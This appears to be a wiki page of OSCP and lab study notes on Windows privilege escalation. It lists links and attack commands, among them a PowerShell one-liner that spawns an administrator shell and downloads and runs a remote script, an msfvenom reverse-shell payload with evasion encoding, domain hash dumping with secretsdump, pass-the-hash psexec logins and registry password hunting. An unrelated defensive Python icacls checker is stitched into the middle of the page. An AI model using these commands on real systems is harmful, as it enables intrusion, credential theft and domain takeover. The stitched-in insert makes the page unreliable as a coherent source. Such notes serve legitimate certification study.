Windows Privilege Escalation - A1vinSmith/OSCP-PWK GitHub Wiki
Fix PATH variable
set PATH=%SystemRoot%\system32;%SystemRoot%;
Quick wins (maybe Responder too)
whoami /priv
tasklist /svc
Use Responder when you can trigger or poison a service so that other users act on it, e.g. an SMB attack.
Find creds or scripts
C:\Users>dir /S /B *.ps1
The /S switch lists files recursively (including sub-directories).
The /B switch displays only the file names without additional information.
Get-ChildItem -Recurse -Filter nc.exe
Constrained Language mode
Scheduled Tasks
Bypass a restricted set of privileges
Fodhelper
- PEN-300 Advanced Antivirus Evasion
Privilege Escalation Abusing Tokens that HTB Academy missed
SeBackupPrivilege
- https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens#sebackupprivilege-3.1.4
- https://medium.com/r3d-buck3t/windows-privesc-with-sebackupprivilege-65d2cd1eb960
- https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/
- https://juggernaut-sec.com/sebackupprivilege/
SeRestorePrivilege
- https://juggernaut-sec.com/proving-grounds-heist/
- https://github.com/A1vinSmith/OSCP-PWK/tree/master/PgPractice/Windows/Heist
SeManageVolumePrivilege
https://github.com/A1vinSmith/OSCP-PWK/tree/master/PgPractice/Windows/Access#escalation
AD Recycle Bin Group
Manual credential hunting
reg query HKLM /f pass /t REG_SZ /s
https://github.com/A1vinSmith/OSCP-PWK/tree/master/PgPractice/Windows/Meathead
Switch to administrator with a password
It's bizarre. On Linux it is just su - root with pw Welcome1!,
but on Windows you have to spawn another shell:
$passwd = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('administrator',$passwd)
Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.webClient).downloadString('http://10.10.16.9/shell2.ps1')" -Credential $creds
- Alternative option A: use this PS script. https://github.com/A1vinSmith/RunasCs/blob/master/Invoke-RunasCs.ps1
- Alternative option B: Invoke-Command instead of Start-Process. https://github.com/A1vinSmith/OSCP-PWK/tree/master/HackTheBox/Windows/Active%20Directory/Resolute#clean-up-by-del-the-share
Look into Program Files for interesting files
- Program Files
- Program Files (x86)
- C:\ <- root level
icacls on interesting files
icacls job.bat
https://app.hackthebox.com/machines/Markup/walkthroughs
TY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
Looking at the permissions of job.bat using icacls reveals that the group BUILTIN\Users has full control (F) over the file. The BUILTIN\Users group represents all local users, which includes Daniel as well. We might be able to get a shell by transferring netcat to the system and modifying the script to execute a reverse shell.
chmod +r root.txt
icacls root.txt /grant alfred:F
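As an added defensive check (not part of these notes or the walkthrough they quote): a Python script that parses icacls output and flags files where a group every local or authenticated user belongs to holds modify/write rights, which is exactly the condition the job.bat discussion above turns on. The sample output is constructed: the job.bat entry mirrors the listing above (with its Users entry at RX, so it is not flagged), and C:\scripts\backup.bat is a hypothetical path whose ACL does grant BUILTIN\Users and Everyone write access.

```python
import re

# Constructed sample icacls output (not captured from a real host). The first
# entry mirrors the job.bat listing above; the second is a hypothetical script
# whose ACL grants write access to low-privileged groups, for contrast.
SAMPLE_ICACLS_OUTPUT = """\
job.bat NT AUTHORITY\\SYSTEM:(I)(F)
        BUILTIN\\Administrators:(I)(F)
        BUILTIN\\Users:(I)(RX)

C:\\scripts\\backup.bat NT AUTHORITY\\SYSTEM:(I)(F)
                       BUILTIN\\Administrators:(I)(F)
                       BUILTIN\\Users:(I)(F)
                       Everyone:(M)

Successfully processed 2 files; Failed processing 0 files
"""

# Principals whose authority name contains a space need explicit handling;
# everything else is DOMAIN\name, a bare name such as Everyone, or CREATOR OWNER.
PRINCIPAL = (r"(?:(?:NT AUTHORITY|NT SERVICE|APPLICATION PACKAGE AUTHORITY|[^\s\\:]+)"
             r"\\[^:\\]+|CREATOR OWNER|CREATOR GROUP|[^\s\\:]+)")
RIGHTS = r"(?:\([^)]*\))+"
# First line of each file: "<path> <principal>:(flags)(rights)"
FILE_LINE = re.compile(rf"^(?P<file>\S.*?)\s+(?P<principal>{PRINCIPAL}):(?P<rights>{RIGHTS})$")
# Continuation lines are indented and carry only "<principal>:(rights)"
CONT_LINE = re.compile(rf"^\s+(?P<principal>{PRINCIPAL}):(?P<rights>{RIGHTS})$")

# icacls right abbreviations that let the holder change, replace or delete the file.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "WEA", "D", "DC", "WDAC", "WO"}

# Groups that every local or authenticated user is a member of (compared case-insensitively).
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}


def parse_icacls(text):
    """Return {file: [(principal, (right, ...)), ...]} parsed from icacls output."""
    acls = {}
    current = None
    for line in text.splitlines():
        if not line.strip() or line.startswith("Successfully processed"):
            continue  # blank line or the trailing summary line
        m = FILE_LINE.match(line)
        if m:
            current = m.group("file")
            acls.setdefault(current, [])
        else:
            m = CONT_LINE.match(line)
            if not m or current is None:
                continue  # not an ACE line we understand; skip it
        # "(I)(RX)" -> ("I", "RX"); comma-joined groups like "(RX,W)" are split too
        tokens = re.findall(r"\(([^)]*)\)", m.group("rights"))
        rights = tuple(r.strip() for tok in tokens for r in tok.split(",") if r.strip())
        acls[current].append((m.group("principal"), rights))
    return acls


def find_weak_aces(text):
    """List (file, principal, rights) where a low-privileged group can modify the file."""
    findings = []
    for path, aces in parse_icacls(text).items():
        for principal, rights in aces:
            if principal.lower() in LOW_PRIV_PRINCIPALS and WRITE_RIGHTS & set(rights):
                findings.append((path, principal, rights))
    return findings


if __name__ == "__main__":
    for path, principal, rights in find_weak_aces(SAMPLE_ICACLS_OUTPUT):
        print(f"WEAK: {path} grants {principal} {'/'.join(rights)}")
```

Feed it real output with `icacls "C:\Program Files" /T > acl.txt` and pass the file contents to find_weak_aces; RX entries are ignored, so only ACEs that actually allow a low-privileged group to change a script or binary are reported.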
mimikatz
Weaponizing privileged file writes
When you have at least write permission on the Windows folder:
- https://github.com/A1vinSmith/OSCP-PWK/tree/master/PgPractice/Windows/Craft2#upload-ncexe
- https://github.com/A1vinSmith/OSCP-PWK/tree/master/PgPractice/Windows/Access#i-dont-know-why-but-it-seems-we-got-the-full-permissions-of-the-windows-folder
Counterpart on Linux
https://steflan-security.com/linux-privilege-escalation-writable-passwd-file/
Links and cheatsheets
- https://mysecurityjournal.blogspot.com/p/client-side-attacks.html
- https://www.fuzzysecurity.com/tutorials/16.html
- https://infosecwriteups.com/privilege-escalation-in-windows-380bee3a2842
- https://payatu.com/blog/suraj/Windows-Privilege-Escalation-Guide
- https://book.hacktricks.xyz/windows/windows-local-privilege-escalation
USOSVC
https://0xdf.gitlab.io/2020/02/01/htb-re.html#path-1-abuse-usosvc
Domain Controller backup account credentials (Impacket)
This account has a unique permission that allows all Active Directory changes, including password hashes, to be synced to it. With Impacket's secretsdump.py we can retrieve every password hash this (domain-controller-synced) account has access to, which effectively gives full control over the AD domain.
sudo python3 secretsdump.py spookysec.local/[email protected] # spookysec.local is the domain here
sudo python3 secretsdump.py [email protected] # It also can be omitted
Login with full control of the AD Domain (Impacket)
python3 psexec.py [email protected] -hashes LMHASH:NTHASH
Login with credentials
python3 psexec.py Domain/user:[email protected]
or
python3 psexec.py Domain/user:pass@IP
Alternative tool: evil-winrm https://github.com/Hackplayers/evil-winrm
With Metasploit
- https://blog.razrsec.uk/steel-mountain-walkthrough/
- https://medium.com/@ratiros01/tryhackme-steel-mountain-2ab2353cb302
upload shell_path/shell_name
load powershell
powershell_shell
. .\PowerUp.ps1
Invoke-AllChecks
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.22.145 LPORT=4443 -e x86/shikata_ga_nai -f exe -o ASCService.exe
Without Metasploit
Using SimpleHTTPServer, netcat and the payload to get the shell. Use PowerShell and winPEAS to escalate.
powershell -c "Invoke-WebRequest -Uri http://10.4.3.98:8910/winPEAS.exe -OutFile winPEAS.exe"
powershell -c "Invoke-WebRequest -OutFile winPEAS.exe http://10.4.3.98:8910/winPEAS.exe"
powershell -c wget "http://10.4.3.98/winPEAS.exe" -outfile "winPEAS.exe"
Others
Mimikatz
Look up registry values
Reg Query "HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat" /s
Hacking with Powershell
Automated Script
https://www.hackingarticles.in/window-privilege-escalation-automated-script/
- WinPEAS
- Seatbelt
- SharpUp
- JAWS – Just Another Windows (Enum) Script
- PowerUp
- Powerless
Metasploit:
- Windows-Exploit-Suggester
- Sherlock
- WinPEAS/SharpUp/Seatbelt
PowerShell Empire:
- WinPEAS
- PowerUp
- Sherlock
- Watson
- Privesccheck